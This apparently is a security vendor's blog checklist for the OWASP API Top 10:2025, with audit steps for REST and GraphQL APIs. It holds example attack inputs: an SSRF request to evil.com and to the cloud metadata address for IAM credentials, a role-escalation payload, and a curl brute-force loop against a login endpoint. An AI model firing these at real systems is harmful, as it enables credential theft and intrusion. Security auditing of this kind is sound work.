CAI Technology
Book a demo
Menu ☰
aegis · · 8 min read

OWASP API Top 10:2025 — Complete Checklist for RESTful APIs

APIs differ from traditional web apps. The OWASP API Top 10:2025 lists the most critical risk categories and how to validate them.

CAI Technology · Last reviewed: 5/9/2026
OWASP API Top 10:2025 — Complete Checklist for RESTful APIs

In Short

APIs (REST, GraphQL) differ from traditional web applications: they lack a UI to hide implementation details, directly expose business logic, process large volumes of data, and rely on token-based authentication. The OWASP API Security Top 10:2025 classifies the 10 most critical risk categories in the API landscape.

In 2026, ~70% of significant breaches involve an API vulnerability (Akamai 2024 report). APIs daily expose credit cards, medical records, location data, and credentials—without a UI to “hide” the data, everything is accessible if the endpoint is not properly protected.

This checklist is for the dev + security team building or auditing RESTful or GraphQL APIs.

OWASP API Top 10:2025 — Complete List

API1:2025 — Broken Object Level Authorization (BOLA / IDOR)

The most frequent API vulnerability. The endpoint /api/v1/users/12345/profile returns the profile of user ID 12345—but does not verify if the authenticated user has the right to view that profile.

The attacker sends ?id=12346, ?id=12347, etc. → enumerates all profiles.

Verification: for every endpoint with an ID in the URL, verify:

API2:2025 — Broken Authentication

Predictable JWT tokens, lack of rate limiting on /login, password reset with plain links (no TTL), session fixation, lack of MFA for sensitive accounts.

Verification: test with Hydra/Burp Suite on endpoints /login, /reset, /refresh. Check token TTL, rate limits, and MFA for admins.

API3:2025 — Broken Object Property Level Authorization (BOLA + Mass Assignment)

Endpoint PATCH /api/v1/users/12345 accepts payload {role: "admin"} and updates the DB directly. The user self-promotes to admin.

Verification: explicit allowlist of editable fields per endpoint. Frameworks (Rails strong_params, Express express-validator) have dedicated patterns.

API4:2025 — Unrestricted Resource Consumption

Endpoint /api/v1/search?limit=999999 returns 999,999 results. CPU + DB brought to their knees.

Verification: hard limit on pagination (limit ≤ 100), rate limiting per user/IP, timeout per request, queue prioritization.

API5:2025 — Broken Function Level Authorization (BFLA)

/api/v1/admin/users/12345/delete accessible by a user with role user—not just admin. Privilege escalation.

Verification: systematically test all admin endpoints with a user session. Use role-based access control (RBAC) middleware at the framework level.

API6:2025 — Unrestricted Access to Sensitive Business Flows

/api/v1/cart/checkout accepts reservations without rate limiting. An attacker bot makes 10,000 reservations for popular events → business DoS.

Verification: identify key business flows + add CAPTCHA / device fingerprinting / friction.

API7:2025 — Server Side Request Forgery (SSRF)

POST /api/v1/upload-from-url {"url": "http://evil.com/payload"} → your server performs a GET to an external URL. Attacker sends "url": "http://169.254.169.254/latest/meta-data/iam/credentials" → AWS metadata service → IAM credentials.

Verification: allowlist domains, deny localhost, 169.254.0.0/16 (cloud metadata), 10.0.0.0/8, 192.168.0.0/16 (internal).

API8:2025 — Security Misconfiguration

Verbose errors in production (stack trace with DB schema), Access-Control-Allow-Origin: * with Allow-Credentials: true, lack of HSTS on API endpoints, exposed debug endpoints.

Verification: full scan of headers + response body for info disclosure.

API9:2025 — Improper Inventory Management

/api/v1/users deprecated but still active; /api/v0/internal/admin left over from testing; staging.api.firma.ro publicly accessible with production data.

Verification: exhaustive inventory of public APIs (incl. legacy + staging) + clear sunset policy for old versions.

API10:2025 — Unsafe Consumption of APIs

Your API consumes third-party APIs (Stripe, Twilio, etc.) and integrates the data into responses without validation. If the third party is compromised, the attacker’s payload reaches your users.

Verification: validate + sanitize all data coming from external APIs before returning it to users.

API Audit Implementation

Step 1 — Endpoint Inventory

Complete listing of endpoints:

# OpenAPI / Swagger spec extraction
curl https://firma.ro/openapi.json | jq '.paths | keys'

# Discovery via crawl + Wayback
katana -u https://api.firma.ro -d 3
gau api.firma.ro

Step 2 — Test each endpoint with user + admin session

For every combination (endpoint, role):

  1. Test without auth → must return 401 or 403
  2. Test with user role → check BOLA + BFLA
  3. Test with admin role → check expected behavior

Step 3 — Test schema validation

Send malformed payloads:

Step 4 — Test rate limiting

# Bursting
for i in {1..1000}; do curl -X POST https://api.firma.ro/login -d 'user=admin&pass=test'; done

Expected: 429 Too Many Requests after N requests.

Step 5 — Test SSRF

For endpoints with URL/file input:

curl -X POST https://api.firma.ro/upload-from-url \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'

Expected: 400 Bad Request or explicit filter.

ARTEMIS API Audit (in 2026 roadmap)

ARTEMIS extends the audit_type catalog with a dedicated api type for OWASP API Top 10 — available Q3 2026. Until then, manual audit with Burp + ZAP is recommended.

🔗 Complementary CAI Technology Solutions

tehnic@caitech.ro

We start with a 30-minute conversation.

Free AI-readiness audit for companies with 50+ employees. We reply within 24 hours.

Open contact form →